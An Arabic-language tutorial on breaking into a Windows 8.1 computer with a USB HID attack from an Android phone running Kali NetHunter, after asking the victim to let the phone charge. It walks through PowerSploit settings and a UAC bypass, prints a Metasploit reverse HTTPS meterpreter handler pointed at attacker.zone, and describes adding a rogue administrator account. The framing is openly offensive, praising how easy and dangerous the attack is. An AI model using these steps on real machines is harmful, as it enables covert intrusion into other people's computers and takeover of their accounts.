كيفية اختراق نظام Windows 8.1 بهجوم USB HID Android
السلام عليكم و رحمة الله تعالى و بركاته
اليوم في درس جديد لكيفية إختراق الأجهزة الكمبيوتر بإستعمال الكالي لينكس لهواتف الأندرويد
من فترة طويلة و أنا أريد استخدام نظام Kali – NetHunter المعدل للعمل مع نظام أندرويد على عدة اجهزة (Nexus 4, 5, 7, 10, OnePlusOne) وسيتم دعم المزيد مستقبلا. توزيعة NetHunter تحمل في قلبها توزيعة Kali وتستطيع أن تعمل كل ما تعمله Kali. في نفس الوقت, هناك إضافات و تسهيلات جعلت الاختراق أسهل بكثير وهناك العديد قادم في هذه التوزيعة الواعدة من تطوير offensive-security. هجوم اليوم هو HID أو Human Interface Device عن طريق استغلال توصيل الهاتف المحمول بالكمبيوتر وهذا شائع جدا ويسهل عليك أن تطلب شحن هاتفك من أي أحد يملك جهاز كمبيورت وغالبا ستقابل ترحابا بكل سهولة. هناك تطبيقات غير محدودة لهذا الهجوم وسنعرض اليوم إحداها.
خطوات الاختراق
سأفترض مسبقا بأنك ملم بالمصطلحات التقنية التي ذكرت وسأتضطرق لتعريف الجديد منها في موضوعي.
1. تشغيل الأباتشي
اختر NetHunter Home Launcher
ثم اسحب الشاشة من اليسار إلى اليمين و اختر Kali Service Control
ثم فعل الأباتشي من القائمة
2. إعدادات هجوم الـ USB HID
سأحاول وضع الخطوات بشكل مفصل كي نستفيد منه في شروحات قادمة -إن شاء الله-
2.1. جعل أندرويد في USB Debugging mode
من قائمة البرامج, اذهب إلى
Settings >> Developer options >> Android debugging
2.2. وصل الهاتف بالجهاز المراد اختراقه
إذا تم التوصيل بنجاح ستجد تنبيه الـ Debugging mode في شريط تنبيهات الهاتف وبدونه لن تنجح عملية الاختراق
2.3. إعدادت الـ PowerSploit
مشروع الـ PowerSploit واحد من أجمل المشاريع الموجودة على الساحة حاليا و يستخدم إمكانيات الـ PowerShell في اختراق الويندوز. تم استخدام أحد إمكانيات هذا المشروع في توزيعة NetHunter بشكل رائع.
هذا الاستغلال يسمح لك بتشغيل اتصال HTTPS عكسي على Metasploit meterpreter
هناك أربع إعدادات رئيسية
IP Address – LHOST : وهو عنوان الجهاز المشغل للميتاسبلويت handler سنتفترض أنه attacker.zone
Port – LPORT: وهو المنفذ الذي ينصت إليه الـ metasploit handler
Payload: وهنا أنت مخير بين الـ HTTP و HTTPS طبعا الأخير أفضل
URL to Payload : غاالبا يكون نفس عنوان الهاتف المحمول -لهذا قمنا بتفعيل الأباتشي سابقا- إلا إذا كنت قد أعدت الـ Payload في مكان أخر.
2.3.1. تخطي التحكم في صلاحيات المستخدم UAC
نقوم بهذه الخطوة كي نضمن تنفيذ الهجوم بأعلى صلاحيات ممكنة والتأكد من عدم منع النظام للهجوم من تنفيذ أوامر الـ PowerSploit
2.3.3. إعداد الميتاسبلويت وتنفيذ الهجوم
تشغيل الميتاسبلويت و الـ handler على الهاتف الجوال أو على الجهاز المحدد في جزء IP Address -LHOST سابقا والذي سيتصل عليه الـ Reverse HTTPS meterpreter
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST attacker.zone
set LPORT 4444
run
وأخيرا تنفيذ الهجوم
2.4. إعدادت الـ Windows CMD
هنا نفس طريقة الهجوم السابقة -ونفس الخطوات عدا تشغيل الأباتشي- لكن ينفذ أوامر تقوم أنت بإعدادها مسبقا و يقوم بتنفيذها على جهاز الضحية بدلا من تشغيل Reverse HTTPS meterpreter shell.
مثلا سنضيف مستخدم جديد اسمه KING ونجعله في مجموعة المدراء Administrators. طبعا تستطيع تعديل و إضافة ما تشاء من أوامر
شخصيا منبهر من سهولة و خطورة الهجوم و كيف أصبح جوالك ألة اختراق متحركة و بأقل الخطوات
إلى هنا إنتهى الدرس
سلام